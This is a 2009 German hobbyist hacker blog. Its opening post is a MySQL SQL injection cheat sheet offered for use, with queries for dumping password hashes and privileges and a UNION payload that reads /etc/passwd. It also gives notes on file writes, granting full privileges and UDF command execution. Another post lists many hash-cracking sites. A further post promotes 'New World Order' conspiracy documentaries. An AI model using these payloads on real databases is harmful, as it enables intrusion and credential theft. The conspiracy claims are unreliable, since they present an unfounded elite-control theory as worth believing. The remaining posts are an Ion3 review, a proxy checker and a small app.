SQL Injection Cheat Sheet

Mai 19, 2009
Version SELECT @@version
Comments SELECT 1; #comment
SELECT /*comment*/1;
Current User SELECT user();
SELECT system_user();
List Users SELECT user FROM mysql.user; — priv
List Password Hashes SELECT host, user, password FROM mysql.user; — priv
Password Cracker John the Ripper will crack MySQL password hashes.
List Privileges SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privs

SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privs

SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)

SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns

List DBA Accounts SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‚SUPER‘;

SELECT host, user FROM mysql.user WHERE Super_priv = ‚Y‘; # priv

Current Database SELECT database()
List Databases SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db — priv
List Columns SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‚mysql‘ AND table_schema != ‚information_schema‘
List Tables SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‚mysql‘ AND table_schema != ‚information_schema‘
Find Tables From Column Name SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‚username‘; — find table which have a column called ‚username‘
Select Nth Row SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
Select Nth Char SELECT substr(‚abcd‘, 3, 1); # returns c
Bitwise AND SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0
ASCII Value -> Char SELECT char(65); # returns A
Char -> ASCII Value SELECT ascii(‚A‘); # returns 65
Casting SELECT cast(‚1‘ AS unsigned integer);
SELECT cast(‚123‘ AS char);
String Concatenation SELECT CONCAT(‚A‘,’B‘); #returns AB
SELECT CONCAT(‚A‘,’B‘,’C‘); # returns ABC
If Statement SELECT if(1=1,’foo‘,’bar‘); — returns ‚foo‘
Case Statement SELECT CASE WHEN (1=1) THEN ‚A‘ ELSE ‚B‘ END; # returns A
Avoiding Quotes SELECT 0x414243; # returns ABC
Time Delay SELECT BENCHMARK(1000000,MD5(‚A‘));
SELECT SLEEP(5); # >= 5.0.12
Make DNS Requests Impossible?
Command Execution If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar).  The .so file should contain a User Defined Function (UDF).  raptor_udf.c explains exactly how you go about this.  Remember to compile for the target architecture which may or may not be the same as your attack platform.
Local File Access …‘ UNION ALL SELECT LOAD_FILE(‚/etc/passwd‘) — priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile ‚/tmp/somefile‘; — priv, write to file system
Hostname, IP Address Impossible?
Create Users CREATE USER test1 IDENTIFIED BY ‚pass1‘; — priv
Delete Users DROP USER test1; — priv
Make User DBA GRANT ALL PRIVILEGES ON *.* TO test1@’%‘; — priv
Location of DB files SELECT @@datadir;
Default/System Databases information_schema (>= mysql 5.0)
mysql
Advertisements

some online hashcracker….

Mai 16, 2009


http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://md5.dustinfineout.com/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://md5.xpzone.de/
http://www.csthis.com/md5/
http://md5.benramsey.com/
http://www.md5this.com/Cr*ck-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://md5search.deerme.org/
http://www.md5decrypter.com/
http://securitydb.org/cracker/
http://plain-text.info/index/
http://www.tmto.org/?category=main&page=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://md5crack.it-helpnet.de/index.php?op=add
https://astalavista.net/index.php?
http://md5search.uk.to/

MD5:
http://md5.sh4ka.fr
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/ – Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/ (for those who can’t read russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in…roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-Cr*ck/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.jock-security.com/md5_database/?page=Cr*ck
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php
http://www.md5-db.com/index.php

MD4:
http://www.securitystats.com/tools/hashcrack.php
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/

SHA1:
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.rainbowcrack-online.com/
http://schwett.com/md5/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.ph…p;products_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-Cr*ck/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/


Angriff auf Berlin – Wie China uns ausspioniert

Mai 16, 2009

Im Mai 2007 sind Chinesische Hacker heimlich in das Bundeskanzleramt eingedrungen. Tausende Dokumente wurden von der Regierungszentrale gestohlen, und nach China geleitet. Es liegt sehr Nahe, dass die oft Patriotischen  Hacker Unterstützung ihrer Regierung bekommen. Wobei diese alles abstreitet. China ist bereits bekannt für seine Vorreiterstellung in Sachen Cyber Krieg und Online Spionage. Das Internet nimmt eine immer wichtigere Rolle in der Kriegs und Spionage Führung ein. Klar, es wird ja auch weltweit von fast allen Behörden genutzt. Die Dokumentation ist wirklich zu empfehlen.

Doku starten…

More:

heise online Meldung von 25.08.07


Fun Things ToDo With Your Mom

Mai 14, 2009


ION3 – Der Tilling Fenstermanager

Mai 13, 2009

Hey,

Ich habe in meiner Linux Laufzeit schon viele verschiedene window manager/Desktop Umgebungen ausprobiert. Vom klickbunti KDE bis zur Fluxbox war alles dabei. Jedoch möchte ich euch heute, vom dem sicher noch nicht jedem bekannten window manager Ion berichten.

Ich arbeite schon ca 2 Monate damit und bin vollständig zu Frieden 😉

Bei Ion, dieser zurzeit in Version 3 erhältlich ist, handelt es sich um einen window manager dieser volle Tastatur Bedienung unterstützt, hierbei arbeitet dieser mit dem „Tilling“ Modus und über sogenannte frames. Alternativ lassen sich für Anwendungen wie z.B The Gimp auch Fenster in den floating Modus versetzen, wie man es von anderen WM’s gewöhnt ist, somit ist die gewohnte Bedienung relativ gut möglich. Die Frames sind beliebig auf dem Bildschirm ausrichtbar (Größe und Höhe) und füllen somit immer den gesamten Schirm. Ich finde das vorteilhaft, da man eben kaum mal die Übersicht verliert. Weiterhin werden mehrere Clients in einem Frame in Tabs unterteilt, wie man es auch von den Browser Familien gewohnt ist.

Ion3 in aktion (Alsa Mixer,Irssi (IRC), und Conky

Ion3 in Aktion (Alsa Mixer,Irssi (IRC), und Conky

Die Tabs und Frames können einzeln über die Tastatur shortcuts angesprochen und bearbeitet werden. Ion3 ist ebenso Super erweiterbar wie funktional. Verdanken hat er dies, einer Schnittstelle zur Scriptsprache LUA.

Tasten Kombinationen. (ubuntuusers.de)

Tastenkürzel Wirkung
Alt + F9 neuen Workspace erstellen
Alt + 0 bis 9 zu den Workspaces springen
Alt + , / . zum vorigen/nächsten Workspace springen
Alt + Tab ⇆ / P / N zum Frame rechts/oben/unten vom aktuellen
Alt + K + N / P zum nächsten / vorigen Tab innerhalb des Frames
Alt + K K zu Anwendung, die Aufmerksamkeit verlangt
Alt + S Frame vertikal aufteilen
Alt + K + S Frame horizontal aufteilen
Alt + H / V Frame horizontal / vertikal maximieren
Alt + Vollbildmodus für aktuelle Anwendung umschalten
Alt + A Frame in vorhandenes Tiling einbinden
Alt + K + B Frame in neues Tiling einbinden
Alt + K + R ausgewählen Frame nach vorne holen
Alt + R Größenänderungsmodus
Größenänderungsmodus verlassen
nichts / / Alt + B / F / P / N vergrößern / schrumpfen / bewegen nach rechts / links / oben / unten im Größenänderungsmodus
Alt + [linke Maustaste auf Tab] Frame verschieben
[linke Maustaste auf Rand] oder Alt + [rechte Maustaste auf Tab] Größe des Frames ändern
Alt + C markierte Anwendung schließen
Alt + K + C Beenden der markierten Anwendung erzwingen („kill“)
F2 Xterm starten
F3 Startmenü
F9 Workspace-Abfrage (siehe Layouts)
F12 Ion3 Hauptmenü
Alt + G Liste aller Fenster anzeigen

Es ist Geschmackssache ob man mit einem window manager wie ION glücklich wird. Mir gefällt er wirklich sehr. Da ich schon immer fan vom schlichten und übersichtlichem war, ist dies genau das richtige für mich. Außerdem ist die große Freiheit alles mit der Tastatur zu bedienen, doch echt 1337 oder? ;-P

Hier geht es zur Offiziellen Webseite, auf dieser ihr auch schöne LUA Modifikationen erhaltet.

Vergleichbares zu ION wären z.B WMII , RatPoison oder auch LarsWM.

Das war’s mal wieder von mir 😉

GreeZ

ach, btw http://iki.fi/tuomov/dl/ion-3ds-20070318.tar.gz *g


[Perl] Socks5/Proxy list Checker

Mai 10, 2009
  1. #!/usr/bin/perl
  2. #Socks/Proxy Checker!
  3. use IO::Socket;
  4. print qq „
  5. ~~~~~~~~~~~~~~~~~~~~~~~
  6. Socks5 Checker\n
  7. by Blacky\n
  8. Usage $0 liste timeout goodput badput timeout\n
  9. Usage $0 list.txt proxylist.txt dontwork.txt 3\n
  10. ~~~~~~~~~~~~~~~~~~~~~~~
  11. „;
  12. my $liste = $ARGV[0];
  13. my $working = $ARGV[1];
  14. my $notwork = $ARGV[2];
  15. my $timeout = $ARGV[3];
  16. chomp($working);
  17. chomp($notwork);
  18. chomp($timeout);
  19. open (proxylist, „>>$working“) or print „Protokoll Datei nicht gefunden\n“;
  20. open(notw, „>>$notwork“) or print „Keine Datei angegeben!\n“;
  21. open(liste, „<$liste“) or print „Keine Proxy Liste!\n“;
  22. while(<liste>) {
  23. print „Prüfe…\n“;
  24. $proxys = $_;
  25. chomp($proxys);
  26. @list = split(/:/, $proxys); # Trenne IP:PORT
  27. $try = IO::Socket::INET->new (
  28. PeerAddr => $list[0],
  29. PeerPort => $list[1],
  30. Timeout => $timeout, #sek?
  31. );
  32. if ($try) {
  33. print „Verbindung zu $list[0] auf $list[1] erfolgreich\n“;
  34. print proxylist „$list[0]\:$list[1]\n“;
  35. }
  36. else
  37. {
  38. print „Verbindung zu $list[0] auf $list[1] fehlgeschlagen!\n“;
  39. print notw „$list[0]\:$list[1]\n“;
  40. }
  41. }
Usage sollte alles erklären 😉
Viel Spaß Damit!

Just victims of the in-house drive-by

Mai 1, 2009

They say jump, you say how high!


Clipboard – simple desktop notice

April 30, 2009

Huhu,

Da ich früher mal Visual Basic Programmierte(Ich Programmiere gerne Krankheiten ;D), und es einfach mal wieder „tun“ wollte, habe ich mir die „Linux Variante“ Gambas angeschaut. Bei Gambas handelt es sich um eine VB Ähnliche Basic Sprache (Dialekt). Als kleines start Projekt, habe ich mir einen Text Cliper zusammengebastelt. Ich taufe ihn „Clipboard“.

clipboard bild

Clipboard in Aktion 😉

Installation:

Für Debian oder Ubuntu User, einfach das *.deb Package mit dpkg installieren

http://localhostr.com/files/36276b/clipboard_v0.0.1_i368_linux_debian.deb

$ dpkg -i clipboard_v0.0.1_i368_linux_debian.deb

Die Software ist danach (Gnome und KDE) unter „System“ auffindbar.

Für andere Distributionen kann ich Portierungen vornehmen, oder euch die tar.gz anbieten.

http://localhostr.com/files/431ce2/clipboard_v0.0.1_i368_linux_debian.tar.gz

Auf großartiges Eye Candy habe ich verzichtet, wer Bugs findet, oder Wünsche hat, kann sich gerne melden.

Steht natürlich unter der GPL 😛

Insgesamt ist Gambas ganz nett, von der IDE kann es mit Visual Basic 6 und Co mithalten, wobei es viele neue Funktionen wie das Programmieren von CGI Webanwendungen bietet. Die Syntax abweichungen sind wirklich gering und es ist leicht wieder einzutauchen  Für Leute welche mal etwas „quick’n dirty“ unter Linux verwirklichen wollen, gut geeignet.

Wobei ich Perl, doch mehr mag 😛

GreeZ!


NWO – New World Order

April 29, 2009

Viele Menschen sind davon überzeugt, das unser Kapitalistisches System, von einer kleinen Elite, auserwählter „Machthaber“ kontrolliert wird. Ein Solches System gleicht eben keiner Freien Gesellschaft mehr, sondern eher einer Diktatur. Leider geben uns heutige Geschehnisse, wie z.B Vorrats Daten Speicherung oder Zensur, oft zum Nachdenken über solch ein Thema.

Ein Parr nette Dokumentationen, zu dem Thema „New World Order“

Erstens, kann ich „Terror Storm“ empfehlen, von Alex Jones

http://www.infokrieg.tv/terrorstorm_2nd_edition_deutsch.html

Und als meinem Persönlichen Favorit, Zeitgeist und Zeitgeist 2.

http://infokrieg.tv/zeitgeist_deutsch.html

Zeitgeist 2

Schaut es euch an, und lasst es euch durch den Kopf gehen 😉


Socks 5 Tutorial

April 29, 2009

Auf Anfrage eines Users, werde ich das Socks5 Tutorial für Unix Systeme, morgen nocheinmal überarbeiten und verbessern. Leider kann ich euch die Alte version nicht mehr Posten, da ich es einfach nicht mehr finde :/

Tut mir leid.

GreeZ

Blacky.